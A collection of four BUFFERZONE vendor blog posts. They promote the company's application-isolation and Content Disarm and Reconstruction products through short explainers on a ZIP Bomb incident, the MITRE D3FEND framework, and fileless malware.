Target: Consumers

Tags: Zero-Trust, Isolation, Policy, CDR, Trust No File

On July 16, 2023, researchers at DOCGuard [1] uncovered an incidence of a ZIP Bomb malware attack. Despite being scanned by 61 different detection vendors on VirusTotal, only one initially flagged the malicious file. A ZIP Bomb, colloquially known as a decompression bomb or zip of death, is a malicious archive file engineered to cripple or even crash the program or system that attempts to access it. Its prime use is typically to disable antivirus software, thereby paving the way for additional malware threats to breach the system.

At the time of this article’s writing, the detection ratio has slightly improved to 10 out of 61 engines. While it is important to note that no detection method is infallible or offers 100% accuracy, this instance serves as a crucial reminder for security professionals. It highlights the persistent need for vigilance, and how critical it is to continually reassess and recalibrate endpoint security strategies in an era where threats are both diverse and highly sophisticated. However, The ZIP Bomb is just one case and many other evasive attacks from various file formats are used to attack the endpoint. The attacks may come from browsing, file download, file sharing, removable media, and email messages.

The Problem with Malware Detection

Malware detection relies on identifying known patterns, signatures, behaviors associated with malware and may use advanced Artificial Intelligence (AI) detection engines. However, this model struggles with newer and more innovative forms of malware that are designed to evade detection. For instance, the ZIP Bomb mentioned is a prime example of such a threat, demonstrating the challenge in detecting harmful payloads disguised or hidden within compressed files. This highlights the need for a change in thinking away from a sole reliance on detection-based defenses to proactive and isolation-oriented defenses and the need to add them as part of your new security stack.

Introducing Application Isolation and Advanced Policy

Endpoint security has seen a transformative approach through the introduction of application isolation, a method deeply rooted in the zero-trust model. This strategy aims to quarantine individual applications or programs from the broader system environment, effectively containing any potential threats and preventing their interaction with other “trusted” applications within the organization or the underlying system. This significantly curtails the possible ramifications of a security breach.

Consider, for instance, a web browser operating within this isolated environment. In a web-based attack, malicious activity is restricted within this isolated sphere, preventing any potential spread to the operating system or other applications. Therefore, even if a sophisticated piece of malware like a ZIP Bomb eludes initial detection, the damage it could inflict is confined to the isolated environment, neutralizing the threat.

Underpinning this approach is the integral role of endpoint security policies. These policies help to shrink your attack surfaces, thereby reducing the areas where your organization may be vulnerable to cyber threats and attacks. For example, application control settings can be employed as a proactive defense strategy, limiting the types of applications users can run and controlling the code that executes in the system’s core, or kernel. This level of regulation over application behaviors minimizes the overall exposure to potential threats. Furthermore, BUFFERZONE proprietary Firewall enables to control the endpoint communication network efficiently.

Taking this a step further, policies such as those enabled by BUFFERZONE can provide even greater specificity and control. For instance, they can allow for the installation of a certain verified file certificate, enabling the use of Microsoft’s proprietary applications while denying access to others, or blocking all user-downloaded applications altogether. This nuanced approach to application isolation further elevates the effectiveness of endpoint security.

Summary

In conclusion, given the rapidly evolving nature of cyber threats, adopting a security strategy that combines robust policy enforcement with application isolation is an effective approach. It allows an organization to not only defend against known threats but also mitigate the potential impact of unknown threats that evade traditional detection methods. This combination shifts the security paradigm from reactive detection to proactive containment, providing a more resilient defense against emerging threats.

References

[1] DOCGuard Zip Bomb Analysis, Docguard | Detects suspicious files!

Target: Consumers

Tags:  MITRE® D3FEND™, MITRE® ATT&CK™, Safe Workspace^®, CDR, Isolation

In the ever-evolving landscape of cybersecurity, frameworks play a vital role in understanding and explaining how to defend against adversarial tactics and techniques. Two prominent frameworks, MITRE ATT&CK™ and MITRE D3FEND™, provide comprehensive insights into offensive and defensive cybersecurity strategies. This article will delve into what MITRE® D3FEND™ [1] (version 0.12.0-BETA-2) is and explore its relationship with the previously discussed MITRE ATT&CK framework [2] (BLOG). Organizations can develop more robust and effective cybersecurity strategies by understanding these frameworks and their interconnections.

This blog will focus on how BUFFERZONE® Safe Workspace^® prevention and protection capabilities are mapped in the MITRE D3FEND framework.

MITRE ATT&CK:

MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) is a well-established framework focusing on offensive cybersecurity. It provides comprehensive information on the tactics, techniques, and procedures (TTPs) commonly used by adversaries to breach networks and compromise systems [2].

ATT&CK offers a knowledge base and a matrix that categorizes adversary behavior and maps it to various stages of an attack lifecycle [2]. The framework covers various platforms, including Windows, Linux, macOS, mobile devices, cloud-based systems, and industrial control systems [3]. It categorizes TTPs into tactics, techniques, sub-techniques, and documented adversary usage, providing a detailed taxonomy for offensive cybersecurity. The ATT&CK Matrix visualizes the relationships between tactics, techniques, and sub-techniques, enabling organizations to understand the different phases of an attack and associated tactics.

By utilizing ATT&CK, organizations can evaluate common adversary behavior, identify potential vulnerabilities in their systems, and enhance their cybersecurity strategies [2].

What is MITRE D3FEND?

MITRE D3FEND, which stands for “Defensive Cyber Framework,” is a knowledge graph released by MITRE to establish a common language and framework for cybersecurity defenders [1]. It is a companion project to the well-known MITRE ATT&CK framework but with a distinct focus on defensive techniques and countermeasures. While MITRE ATT&CK provides a comprehensive understanding of adversarial tactics, techniques, and common knowledge, D3FEND aims to categorize and illuminate defensive methods employed by cybersecurity professionals [1].

Understanding the Relationship between MITRE ATT&CK and MITRE D3FEND

MITRE ATT&CK focuses on offensive tactics and techniques adversaries use to breach networks, D3FEND concentrates on defensive strategies and countermeasures [1]. The D3FEND framework establishes terminology and vocabulary for defensive techniques, shedding light on the relationships between defensive and offensive methods [2].

By utilizing both frameworks together, cybersecurity professionals comprehensively understand the full spectrum of cyber threats and effective defensive strategies. The ATT&CK matrix visualizes the phases of an adversary’s attack lifecycle. It provides insights into offensive tactics and techniques, while the D3FEND knowledge graph complements it by offering a vocabulary of defensive methods and countermeasures [3].

BUFFERZONE Safe Workspace^® D3FEND Protection Mapping

The MITRE D3FEND framework organizes defensive cybersecurity techniques into six categories or stages of defense:

• Harden: This category focuses on hardening the security of applications, platforms, credentials, and messages. Techniques under this category include application hardening, platform hardening, credential hardening, and message hardening [1].
• Detect: The detect category involves techniques for detecting potential threats and malicious activities. It includes network traffic analysis, process analysis, file analysis, platform monitoring, identifier analysis, message analysis, and user behavior analysis.
• Isolate: Techniques under the Isolate category aim to isolate or contain threats within the network. This includes network isolation and execution isolation methods.
• Deceive: The deceive category involves techniques used to mislead or deceive adversaries. This can be achieved through the creation of decoy environments or decoy objects.
• Evict: The evict category focuses on techniques to evict or remove adversaries from the network. It includes credential eviction and process eviction methods.

D3FEND’s defensive techniques are linked to MITRE ATT&CK techniques and the artifacts they produce, offering a comprehensive understanding of the connection between defensive and offensive methods [1]. BUFFERZONE® Safe Workspace^® is a suite of preventive tools that rely on application isolation technology. It includes Safe Browsing, SafeBridge® (with Content Disarm and Reconstruction (CDR) capabilities), and Safe Removable (for USB attack prevention), all equipped with clipboard security. The Safe Workspace^® virtual container is created by a kernel driver, which divides the operating system into two logical areas.

The first area, referred to as the trusted zone, is connected to all the organization’s networks and files within the operating system. The untrusted zone, the second area, acts as a buffer where various applications can securely operate, isolated from the trusted zone’s memory, files, registry, and processes.

This approach has numerous benefits, including minimal CPU and memory usage, a high-quality user experience, and the ability to work seamlessly within the virtual container while remaining unaware of the protective shield against browsing and USB threats. The following sections will explain how each suite product prevents various attack risks.

The following table summarizes our support per model while we removed the tactics we do not support for simplicity and readability. For further reading, we suggest visiting the MITRE D3FEND website.

Harden

• Credential Hardening:
  • Certificate Based Authentication- BUFFERZONE Passport zone management option lets configure endpoint browsing sessions to be identified to the organizational proxy as originating from contained applications. This enables the proxy to block all outbound communications that are not from contained browsers. When passport enforcement is enabled, browser communications include an encrypted shared secret. The organizational proxy can check for this header and act accordingly. When users attempt to connect to untrusted sites (the internet) from an uncontained browsing session, the BUFFERZONE agent identifies the proxy block and switches to a contained session.
  • Multi-Factor Authentication (MFA) – Users can securely log in to Microsoft Windows through Azure MFA by utilizing Bufferzone kernel agent enforcement. The agent manages the Windows OS User Login process. We do not provide any other authentication mechanism for other applications at this stage.
  • Domain Trust Policy – When using BUFFERZONE Safe browsing, a zone switch function determines whether a website should be accessed within the secure virtual container (untrusted zone) or the secure zone (trusted). This decision is based on the organizations and domain trust policies.
• Message Hardening:
  • Message Encryption – BUFFERZONE Anti-phishing extension alerts against the use of insecure browsing protocols. (From version 2.0)
  • Transfer Agent Authentication – BUFFERZONE Anti-phishing extension alerts against the use of insecure browsing protocols. (From version 2.0).
• Platform Hardening:
  • Driver Load Integrity Checking – When it comes to file installation, BUFFERZONE, based on administrator policy, can define which application can be installed. For example, it ensures that only authentic Microsoft certificates can be installed.
  • Local File Permissions – BUFFERZONE meticulously categorizes local files, discerning their operational capacity within trusted or untrusted zones. To facilitate file transfers from the untrusted to the trusted zone, a Content Disarm and Reconstruction (CDR) process is obligatory. This measure ensures that no potential threats infiltrate the trusted zone. However, file transfers from the trusted zone to the untrusted zone are blocked to further enhance security.
  • Software updates – BUFFERZONE’s Safe Workspace^® fortifies the Operating System (OS) by implementing two key strategies. Firstly, it ensures that the OS is confirmed, fully supported, and meticulously patched. Following this, Safe Workspace keeps a vigilant eye for any latest updates relevant to the software installed within the virtual container. Should an update arrive, it promptly notifies the user.

Detect

BUFFERZONE Safe Workspace^® is a zero-trust prevention based on application isolation and Content Disarm and Reconstruction (CDR). Recently we added anti-phishing detection for Chrome browser. The following described our contribution in the Detect category.

• File Analysis – BUFFERZONE SafeBridge™ is a sophisticated file analysis tool with two key features. Firstly, it boasts a local Content Disarm and Reconstruction (CDR) engine that functions without any internet connection. Secondly, it is a file connector to different third-party detection engines and sandboxing solutions. By utilizing a central management system to set file policies and configurations, it analyzes files obtained from removable storage, web browsing, and downloads.
  • Dynamic Analysis and static analysis – SafeBridge enable third-party detection connectors to various vendors’ dynamic analysis and static analysis engines.
  • File Content Rules – based on the file type BUFFERZONE enforce different file handling policies as part of SafeBridge.
• Identifier Analysis – BUFFERZONE’s advanced Artificial Intelligence (AI) and Threat Intelligence engines are powered by our security measures for user browsing activity. These engines utilize various techniques such as URL analysis, homoglyphs, domain, host, and IP dynamic analysis based on URL sandbox and threat reputation to ensure our users’ highest level of security.
  • Homoglyphs Detection – AI-based Homoglyphs detection.
  • URL Analysis – We provide dynamic, static, and AI-based detection suites for URL analysis. Our AI contains URL analysis, threat Intelligence, Object Detection, and website fingerprinting.
• Network Traffic Analysis:
  • Certificate Analysis – Based on BUFFERZONE PASSPORT.
  • Administrative Network Traffic Analysis- The BUFFERZONE proprietary firewall, based on administrator policies, can be configured to block various protocols, including TeamViewer. However, it should be noted that BUFFERZONE does not perform any network traffic heuristic analysis.
  • Blocking Based on Policy – BUFFERZONE central management enables network protocol blocking.
  • RPC Traffic Analysis – BUFFERZONE effectively manages and monitors RPC traffic within the virtual container. As RPC is a challenging attack vector to prevent, the BUFFERZONE kernel driver takes charge of the untrusted virtual machine, effectively preventing any attempts at exploitation via RPC within the container and attempts for virtual container escapes.
• Platform Monitoring-
  • Operating System Monitoring – The BUFFERZONE agent oversees the process of virtual containers, keeps track of file usage, and sends the resulting data to a syslog server for monitoring by SIEM/SOC.
  • Endpoint Health Monitoring- We collaborate with Absolute® to implement Application Persistence-as-a-Service (APaaS). This firmware-level solution ensures that endpoint health is continuously monitored, and that application persistency is automatically managed.
• Process Analysis-
  • Process Spawn Analysis- BUFFERZONE restricts any unauthorized processes that may be used for malicious attacks, such as DDE, RPC, SVCHOST, shell, and script, from operating within the virtual container. Only authorized processes are permitted to run inside the container. Furthermore, BUFFERZONE monitors the processing activity and exports it to syslog for advanced analysis.
  • Script Execution Analysis- BUFFERZONE prevents running scripts inside the virtual container and logs the attempts.
  • System Call Analysis – The BUFFERZONE agent analyzes the different system calls and processes and isolates system calls that belong to the untrusted zone (isolated zone).
  • File creation analysis –BUFFERZONE agent monitors all file creations, reports them to Syslog, and ensures full isolation between trusted to untrusted zones.

Isolate

BUFFERZONE Safe Workspace core is application isolation MITRE D3FEND defines two categories: Network and Execution isolation.

• Execution Isolation-
  • Executables Allowlist- Safe Workspace controls the execution, and based on policy-driven configuration, can enable installation of executables based on defined application or executable certification.
  • Executables Blocklist- Safe Workspace controls the execution, and based on policy-driven configuration, can disable the installation of executables based on defined application or executable certification.
  • Kernel-Based Isolation- The core technology of BUFFERZONE is based on six patents focused on application and network isolation.
  • Mandatory Access Control- BUFFERZONE kernel agent defines the access control for the application, network, and files based.
  • System Call Filtering- The BUFFERZONE agent controls the system call and isolates system calls between the trusted and untrusted environment.
• Network Isolation-
  • Network Traffic Filtering – Safe Workspace enables control of the inbound and outbound traffic based on a proprietary policy-driven Firewall.
  • Homoglyphs Denylisting – BUFFEROZNE anti-phishing enables to detect homoglyphs. We do that on the URL level.

Evict

Account Locking- BUFFERZONE MFA is integrated with Active Directory and can lock the user from accessing the device. Also, isolating the device from the network is possible by blocking incoming and outgoing network traffic.

Process Eviction –

• Process Termination – With BUFFERZONE, regulating the processes that run within the virtual container and effectively managing them according to the established policies is possible.

Summary

In conclusion, companies should integrate the MITRE D3FEND and MITRE ATT&CK frameworks into their cybersecurity plans to gain a thorough understanding of both offensive and defensive tactics. By utilizing MITRE D3FEND, organizations can identify their safeguarded attack vectors and take necessary measures to enhance protection. BUFFERZONE Safe Workspace^® provides a comprehensive application isolation solution for secure browsing and protection against evasive files from removable media and online activities, making it the perfect choice for companies serious about cybersecurity.

References

[1] MITRE® D3FEND™ Knowledge Graph, https://d3fend.mitre.org/ .

[2] MITRE® ATT&CK™, https://attack.mitre.org/

Target: Consumers

Tags: Fileless Malware, Bypass antivirus, Isolation, CDR

The cybersecurity arena experienced significant evolution in 2020, marked by a substantial rise in fileless malware attacks. The rate skyrocketed to 900% more than the previous year [1]. Furthermore, a recent study from Aqua Security points out a drastic upswing of 1,400% in the number of fileless or memory-based attacks that exploit pre-existing software, applications, and protocols in 2022 [2]. This dramatic surge highlights the increasing complexity of cyber threats and underscores the urgent need for enhanced security mechanisms to ward off such attacks.

What is Fileless attack

Unlike conventional malware, fileless malware does not depend on executable files to perform its harmful activities. Rather, it operates within the system’s memory, eluding detection systems based on signatures that track file actions. This attribute significantly enhances the potency of fileless malware as it can smoothly slip past numerous antivirus solutions [3].

The ability of fileless malware to remain undetected and maintain persistence renders it particularly hazardous. It can penetrate a system merely through a click on a malicious link or a visit to a compromised website, thereby presenting a substantial challenge to standard endpoint protection [1]. It compromises a system by exploiting programs that are typically considered safe and whitelisted by administrators. The lack of file downloads during the infection process makes fileless malware harder to identify than traditional malware, since it can evade hardware scans conducted by conventional antivirus tools.

Notably, the infection process of fileless malware begins when a user, deceived by social engineering methods, clicks on a malicious link or attachment, often delivered through a phishing email [4]. The malware then invades the system and begins to propagate from one device to another.

This implies that a fileless malware attack is part of a larger sequence of cyberattacks. To avert such an attack, it is essential to obstruct the initial attack vectors that trigger it.

There are three primary types of fileless malware attacks: memory code injection, manipulation of the Windows registry [4] and using windows services like Windows Management Instrumentation (WMI).

Memory code injection attacks involve hiding malicious code within the memory of trustworthy applications, typically exploiting weaknesses in software like Flash, Java, or web browsers. The malware operates its code inside these legitimate processes [4].

Conversely, Windows registry manipulation attacks take place when an attacker utilizes a harmful link or file to alter a trusted Windows process. Once a user interacts with the hazardous link or file, the Windows process is employed to write and run fileless code in the registry. These attack types can effectively dodge detection from conventional antivirus software [4].  The third type of malware attacks saves malicious code to WMI’s CIM repository that upon boot starts legitimate services with malicious code. The CIM repository is itself saved to disk, but the code is well hidden [5].

An additional feature of fileless malware is its capability to modify command lines, which are strings of code giving instructions to programs. As no unusual files are associated with the threat, traditional antivirus software often overlooks it [4].

How to stop Fileless attacks

To counteract these threats, it is vital to keep your software updated, particularly when it comes to Microsoft applications. Microsoft has stepped up its security game in recent versions and improved its Windows Defender package to spot abnormal PowerShell activities. Other providers, such as Endpoint Detection and Response (EDR), have put forth detection solutions to avert these attacks.

However, the complexity of detection and the ability of malware creators to test their attacks against these defense mechanisms before launch can lead to the circumvention of existing security measures and bypass them. Consequently, our recommendation is to employ a zero-trust prevention strategy.

BUFFERZONE® Safe Workspace^® is an extensive collection of preventive tools underpinned by application isolation technology. It includes Safe Browsing, SafeBridge® (equipped with Content Disarm and Reconstruction (CDR) capabilities), and Safe Removable (aimed at preventing USB attacks), all reinforced with clipboard security. A kernel driver establishes the Safe Workspace™ virtual container, effectively splitting the operating system into two distinct sections.

The first section, referred to as the trusted zone, connects to all the organization’s networks and the operating system’s files. The second section, the untrusted zone, acts as a buffer, providing a safe space for various applications to operate independently from the trusted zone’s memory, files, registry, and processes.

This avant-garde strategy offers numerous advantages, such as minimal CPU and memory usage, superior user experience, and the capacity to operate smoothly within the virtual container, all while being shielded from browsing and USB threats.

BUFFERZONE® uniquely operates as a solitary virtual containment solution that leverages six patented technologies. Employing Safe Workspace^® provides protection from phishing attacks, harmful downloads, and potentially risky email attachments and links (via an Outlook extension). We hold the belief that security should be simple and accessible to the user.

Try us now!

References:

[1] New Research: Fileless Malware Attacks Surge by 900% and Cryptominers Make a Comeback, While Ransomware Attacks Decline, WatchGuard Technologies, Inc , https://www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html

[2] Michael Hill, Fileless attacks surge as cybercriminals evade cloud security defenses,

https://www.csoonline.com/article/643356/fileless-attacks-surge-as-cybercriminals-evade-cloud-security-defenses.html

[3] An emerging threat Fileless malware: a survey and research challenges, Kumar, Sushil, and others, https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x

[4] What is Fileless Malware, Fortinet,  https://www.fortinet.com/resources/cyberglossary/fileless-malware

[5] Nick Ismail , Defending against fileless malware, https://www.information-age.com/defending-fileless-malware-6282/

Tags: Malware Analysis, CDR, Zero-Trust, Detection 

Audience Tag: Feature Spotlight 

Over 92% of cyber-attacks start with seemingly harmless emails or links? According to a report [1], the number of malicious new files per day has increased by 5.7%, reaching a staggering 380,000 malicious new files per day. With detection methods not being 100% foolproof, a new file security solution is urgently needed. 

The ever-increasing volume of malicious files being circulated poses a significant threat to organizations. Cybercriminals are constantly finding new ways to disguise malware and evade detection, making it crucial for organizations to adopt advanced security measures. Relying solely on traditional antivirus software and other conventional security measures may not provide adequate protection against these rapidly evolving threats. 

To effectively combat this growing menace, organizations need innovative solutions to reduce the attack surface and Content Disarm and Reconstruction (CDR) is a powerful solution. CDR takes a proactive approach by dissecting files and documents, analyzing their components, and reconstructing them to remove potentially harmful elements. By neutralizing potential threats in files, CDR helps prevent malware from infiltrating systems through evasive lure emails, links, or file attachments. 

In the following Figure we can observe a typical file that contains different attack vectors. 

Fig. 1 Typical document illustration that contains attack vectors [2]. 

 The attack vectors may be hyperlinks, macros, known exploits, images and other media components. 

 While Content Disarm and Reconstruction (CDR) is an effective cybersecurity technique, it does have some limitations. During the disarm process, certain file objects may be removed, and active components may be disabled, which can impact the functionality of the resulting file. However, recent academic research [2] has shown that CDR is highly effective in terms of malware disarm rate and is able to remove threats based on detailed validation against multiple antivirus engines, such as VirusTotal. 

One concern with CDR technology is the similarity between the original file and the CDR-reconstructed file. Some studies have shown that the resulting files after CDR may be highly similar, which could raise concerns about potential residual threats. However, it is important to note that CDR solutions are continuously evolving, and newer techniques are being developed to mitigate this concern and improve the similarity between the original and reconstructed files. 

Another limitation of CDR is that some solutions may require internet access (Software-as-a-Service or SaaS), which could raise concerns about privacy and data security. In certain scenarios, private files may be shared with third parties during the CDR process, which may not be desirable for organizations that prioritize data privacy and confidentiality. 

It is important for organizations to carefully evaluate and choose CDR solutions that align with their specific security requirements and risk tolerance. While CDR can be a valuable addition to a comprehensive cybersecurity strategy, it is essential to be aware of its limitations and choose solutions that offer the right balance between security and functionality and comply with privacy and data protection requirements. 

 BUFFERZONE SafeBridge™ CDR 

Currently, Content Disarm and Reconstruction (CDR) solutions are typically deployed in either public cloud or private cloud environments. However, BUFFERZONE CDR stands out as the only vendor that runs CDR within a secure isolated container. This approach reduces latency, eliminates the need for special connectivity, and is cost-effective. 

With BUFFERZONE CDR, downloaded files can be automatically subjected to CDR automatically or based on user desire since user may want to work inside the BUFEERZONE® secure container. Furthermore, BUFFERZONE offers Microsoft Outlook email plugin that CDR all incoming and outgoing emails based on organization configuration. This ensures that every email and downloaded file goes through CDR to remove potential threats and enhance security, without the need for any additional configuration. BUFFERZONE CDR works seamlessly with every downloaded file. 

One of the key advantages of BUFFERZONE CDR is its integration with BUFFERZONE Safe Workspace®, without incurring any additional costs. This means that organizations can benefit from a comprehensive security solution that combines CDR with isolated workspace protection, providing a robust defense against cyber threats. 

In conclusion, BUFFERZONE SafeBridge™ CDR offers a unique approach to content disarm and reconstruction. Running within a secure isolated container, on the host, and as an integral part of BUFFERZONE Safe Workspace™. This provides organizations with a highly effective and efficient solution for securing downloaded files and emails, without the need for special connectivity or additional configuration. Although detection solution exists, they are not 100%, as a result organization must reduce their attack surface based on smart endpoint isolation and CDR. It is proven that CDR can provide an additional layer of defense and significantly improve the organization defense methodology.  

 BUFFERZONE Safe Workspace® offers a novel and robust approach to content disarm and reconstruction, operating within a secure isolated container on the host. This innovative solution provides organizations with a highly effective and efficient means of securing downloaded files and emails, without the need for complex connectivity or additional configuration. While detection solutions may have limitations, organizations can augment their defense strategy by leveraging smart endpoint isolation and CDR, which has been proven to enhance overall security and significantly reduce the attack surface. 

[1] Kaspersky, “New malicious files discovered daily grow by 5.7% to 380000 in 2021”, 2021.  https://www.kaspersky.com/about/press-releases/2021_new-malicious-files-discovered-daily-grow-by-57-to-380000-in-2021 

[2] R. Dubin, “Content Disarm and Reconstruction of RTF Files A Zero File Trust Methodology,” in IEEE Transactions on Information Forensics and Security, doi: 10.1109/TIFS.2023.3241480.